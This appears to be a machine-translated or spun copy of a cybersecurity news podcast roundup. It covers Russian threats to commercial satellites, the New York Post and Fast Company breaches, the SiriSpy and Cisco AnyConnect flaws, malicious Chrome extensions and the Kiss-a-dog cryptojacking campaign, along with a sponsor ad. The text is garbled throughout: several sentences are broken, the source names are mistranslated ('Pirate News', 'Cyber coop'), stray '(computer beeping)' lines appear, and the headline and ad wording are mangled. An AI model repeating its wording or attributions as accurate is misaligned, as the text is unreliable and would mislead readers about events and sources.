Russian Satellite Alert, New York Post Hacked, Fast Company Breach

Russia warns the West: we can target your commercial satellites

This comes from senior Russian Foreign Ministry official Konstantin Vorontsov, deputy director of the Russian Foreign Ministry’s department for non-proliferation and arms control, speaking to the United Nations. He said the commercial satellites of the United States and its allies could become legitimate targets for Russia if they were involved in the war in Ukraine. Vorontsov did not mention any specific satellite company, although Elon Musk said earlier this month that his rocket company SpaceX would continue to fund his Starlink internet service in Ukraine, citing the need for “good deeds”.

(Reuters)

The New York Post claims its site was hacked after posting offensive tweets

The New York Post said it was hacked on Thursday after several offensive articles and tweets were published on the newspaper’s website and Twitter account. The posts and tweets, racist and violent in nature, were taken down shortly thereafter. It is believed that the New York Post’s content management system, used to publish stories and articles, may have been hacked. The offensive tweets were sent via SocialFlow, a popular website plugin used to spread stories on social media sites. The tweets also contained links pointing to web pages on the Post’s website, but which quickly became inaccessible.

(Tech Crunch)

White House announces 100-day chemical sector cybersprint

It’s the most recent sector to embark on President Biden’s 100-day cybersecurity sprint, the administration announced Wednesday, an effort to draw operators’ attention to the most important risks of cybersecurity. ‘digital attack such as gas leaks and other contamination. The sprint also aims to improve information sharing and “analytical coordination” between the public and private sectors and encourage chemical manufacturers to deploy threat detection to control systems. The sprints were first launched as a pilot with the power sector in April 2021 and have been followed with the pipeline, water and railway sectors.

(Cyber ​​coop)

Pizza123 Password Boosts Fast Company

The breach of the Fast Company news channel that occurred in late September was carried out by exploiting an easy-to-guess default password, “pizza123”. The business magazine reused the weak password on a dozen WordPress accounts, according to the hacker, who goes by the name “Thrax” and described the attack as “ridiculously easy” in an article published on FastCompany.com before that the publication does not take the site. down. Hackers claimed to have used the vulnerable pizza123 password to access authentication tokens, Apple News API keys, and Amazon Simple Email Service (SES) tokens. Then they sent offensive push notifications to the home screens of FastCompany channel subscribers on the Apple News service.

(computer beeping)

Thanks to this week’s episode sponsor, Votiro

UFOs are everywhere.
They’re in your apps, cloud storage, endpoints, and email.
It’s true – UFOs – younot identified Fisland Oobjects – hide in files in your organization.
UFOs can contain malware that exfiltrates data or deploys ransomware. And 70% of UFOs cannot be detected by traditional scanning solutions such as antivirus and sandboxing.
This is where Votiro comes in. Votiro warns UFOs before they intrude on files – without detection and without slowing down business.
Do you believe? Learn more at Votiro.com/UFOs.

Apple iOS and macOS flaw could have allowed apps to listen to Siri conversations

A now patched security flaw in Apple’s iOS and macOS operating systems could have allowed apps with Bluetooth access to eavesdrop on conversations with Siri. Apple said “an app may be able to record audio using a pair of connected AirPods,” adding that it fixes the Core Bluetooth issue in iOS 16.1 with enhanced rights. App developer Guilherme Rambo is credited with discovering and reporting the bug in August 2022. The bug, dubbed SiriSpy, was given the identifier CVE-2022-32946.

(Pirate News)

Cisco Warns of Active Exploit Attempts Targeting Cisco AnyConnect Secure Mobility Client for Windows

Cisco warns against exploit attempts targeting two security vulnerabilities, tracked as CVE-2020-3153 (CVSS score: 6.5) and CVE-2020-3433 (CVSS score: 7.8), in Cisco AnyConnect Secure Mobility Client for Windows. Both vulnerabilities are from 2020 and are now patched. The CVE-2020-3153 flaw resides in the installer component of AnyConnect Secure Mobility Client for Windows, an authenticated local attacker can exploit the flaw to copy user-supplied files to system-level directories with privileges at the system level. The CVE-2020-3433 vulnerability resides in the Interprocess Communication Channel (IPC) of the Cisco AnyConnect Secure Mobility Client for Windows. An authenticated local attacker can exploit the issue to perform a DLL hijacking attack. To exploit this vulnerability, the attacker would need to have valid credentials on the Windows system.

(Security Affairs)

Chrome extensions with 1 million installs hijack target browsers

Guardio Labs researchers have uncovered a new malvertising campaign pushing Google Chrome extensions that hijack searches and insert affiliate links into web pages. Since all of these extensions offer color customization options and arrive on the victim’s machine without malicious code to evade detection, analysts have named the campaign “Dormant Colors”. According to the Guardio report, as of mid-October 2022, 30 variants of the browser extensions were available on both Chrome and Edge online stores, amassing over one million installs. When these extensions are first installed, they redirect users to various pages that load malicious scripts that tell the extension how to perform search hijacking and on which sites to insert affiliate links.

(computer beeping)

New cryptojacking campaign targeting vulnerable Docker and Kubernetes instances

Cybersecurity firm CrowdStrike has dubbed the activity Kiss-a-dog, with its command-and-control infrastructure that overlaps with those associated with other groups like TeamTNT, which are notorious for hitting misconfigured Docker and Kubernetes instances. The intrusions, spotted in September, take their name from a domain called “kiss.a-dog[.]top” which is used to trigger a shell script payload on the compromised container using a Base64 encoded Python command.

(Pirate News)

Comments are closed.